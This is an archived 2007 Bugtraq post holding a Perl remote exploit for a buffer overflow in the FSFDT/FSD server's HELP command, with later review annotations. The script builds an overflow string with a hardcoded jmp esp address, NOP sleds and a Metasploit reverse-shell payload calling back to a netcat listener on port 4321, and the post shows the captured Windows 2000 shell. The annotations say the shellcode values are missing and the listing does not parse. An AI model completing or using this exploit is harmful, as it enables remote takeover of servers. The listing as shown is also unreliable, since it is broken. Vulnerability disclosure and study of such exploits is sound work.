Re: Two buffer-overflow in FSD V2.052 d9 and FSFDT V3.000 d9[EXPLOIT]
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: Two buffer-overflow in FSD V2.052 d9 and FSFDT V3.000 d9[EXPLOIT]
- From: weak@xxxxxxxxxx
- Date: 4 Oct 2007 10:19:50 -0000
~$ nc -l -p 4321
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
#
# NOTE(review): this is the archived mailing-list copy of the script. The
# literal values of $jmpcode and $shellcode are absent (both assignments below
# have no right-hand side), the usage check has no block after its condition,
# and the comment beginning "# win32_reverse" was wrapped onto a second,
# uncommented line, so the listing as shown does not parse. Kept as posted;
# the annotations only describe what the visible lines do.
use IO::Socket;
# Argument check: expects <ip> and <port>. No `exit` follows the usage
# message, so even with braces a missing argument would only print it and
# carry on.
if( $#ARGV < 1 )
print "usage: perl ".$0." <ip> <port>";
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
# Plain TCP connection to the target service (indirect-object `new` syntax;
# Perl style guides prefer IO::Socket::INET->new(...)).
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto
=> 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
# Return address tied to that exact KERNEL32.DLL build, which is why the
# "tested on win2k sp4" caveat above matters: a different build breaks it.
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
# Value absent in this copy.
my $jmpcode =
# win32_reverse - EXITFUNC=thread LHOST= LPORT=4321 Size=312
Encoder=PexFnstenvSub http://metasploit.com
# bad chars: 0x00 0x0A 0x0D 0x20 0x29
# Value absent in this copy. The LPORT in the generator line above matches the
# `nc -l -p 4321` listener shown at the top of the post.
my $shellcode =
print "sending payload...\n";
# Everything goes out as one HELP command: 200 filler bytes, the return
# address, 8 bytes of 0x90 (x86 NOP), the stage-1 jump, a newline, then 400
# more 0x90 bytes and the stage-2 payload. On the wire this is a HELP command
# carrying an argument of several hundred bytes — straightforward for a
# server-side length check or a protocol-aware IDS rule to reject.
print $sock "HELP " . "A"x200 . $jmpesp . "\x90"x8 . $jmpcode . "\n" .
"\x90"x400 . $shellcode;
print "done.\n";